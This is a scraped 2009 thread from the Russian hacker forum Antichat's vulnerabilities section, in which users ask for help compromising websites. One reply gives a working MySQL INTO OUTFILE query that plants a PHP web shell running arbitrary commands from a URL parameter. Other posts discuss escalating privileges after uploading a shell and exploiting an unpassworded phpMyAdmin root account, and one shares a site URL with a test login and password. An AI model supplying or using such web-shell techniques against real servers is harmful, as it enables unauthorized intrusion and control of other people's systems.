ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10511  
Старый 01.12.2009, 18:03
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Цитата:
Сообщение от wkar  
Залил на сайт шелл, но доступ к индексу и другим файлам не имею,то есть не могу удалить,редак. и др. чмод 666, меняю на 777 - не меняется, помогите пж.
хы,только рут чмоды раздавать может =) повышай привилегии.
 
Ответить с цитированием

  #10512  
Старый 01.12.2009, 18:06
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

Цитата:
Сообщение от Totgeliebt  
Фото альбомы > >



Дата: 01.01.1970
Добавлено:
Размер: x пикселов

Warning: filesize() [function.filesize]: stat failed for images/photoalbum/album_/ in /home/gamer/public_html/photogallery.php on line 68
Рахмер файла: Bytes
Комментариев: 0
Рейтинг: Пусто
Количество просмотров:
Посмотрите есть тут что плз
P.S Ногами не пинать, я чайничек)
да-да сейчас я покажу свои экстрасенсорные способности и угадаю сайт!!!
У тебя тут есть путь, ты доволен???
 
Ответить с цитированием

  #10513  
Старый 01.12.2009, 18:11
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

поясните пожалуйста что такое "не запароленный пма под рутом "
 
Ответить с цитированием

  #10514  
Старый 01.12.2009, 18:12
Totgeliebt
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме:
125847

Репутация: 5
По умолчанию

Цитата:
Сообщение от [x60]unu  
да-да сейчас я покажу свои экстрасенсорные способности и угадаю сайт!!!
У тебя тут есть путь, ты доволен???
тссс успокойся Вот посмотри пожалуйста
http://la2.sz.ru/photogallery.php?photo_id=1
Вот пользователь для проверки:
логин: caak111
пароль: 1q2w3e4r
 
Ответить с цитированием

  #10515  
Старый 01.12.2009, 18:17
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

как "чистым" (не через инъект) скуль запросом залить шелл на сервер?
 
Ответить с цитированием

  #10516  
Старый 01.12.2009, 18:32
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от wkar  
поясните пожалуйста что такое "не запароленный пма под рутом "
SQL - пользователь root не имеет пароля.

Цитата:
Сообщение от p.r0phe.t  
как "чистым" (не через инъект) скуль запросом залить шелл на сервер?
Так же, как и через инъект...

Код:
SELECT '<?=system($_GET["cmd"])>' FROM table_name INTO OUTFILE '/var/www/shell.php'
 
Ответить с цитированием

  #10517  
Старый 01.12.2009, 18:33
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от wkar  
поясните пожалуйста что такое "не запароленный пма под рутом "

пма-phpmyadmin я так понял...
 
Ответить с цитированием

  #10518  
Старый 01.12.2009, 18:41
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Цитата:
Сообщение от mailbrush  
SQL - пользователь root не имеет пароля.


Так же, как и через инъект...

Код:
SELECT '<?=system($_GET["cmd"])>' FROM table_name INTO OUTFILE '/var/www/shell.php'
Выкидывает
#1 - Can't create/write to file 'D:www uimgc.php' (Errcode: 22)
 
Ответить с цитированием

  #10519  
Старый 01.12.2009, 18:42
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Цитата:
Сообщение от p.r0phe.t  
Выкидывает
#1 - Can't create/write to file 'D:www uimgc.php' (Errcode: 22)
user - root
 
Ответить с цитированием

  #10520  
Старый 01.12.2009, 18:47
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Цитата:


Так же, как и через инъект...

Код:
SELECT '<?=system($_GET["cmd"])>' FROM table_name INTO OUTFILE '/var/www/shell.php'
Parse error: syntax error, unexpected '<' in D:\www\jo.php on line 2 как исправить?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ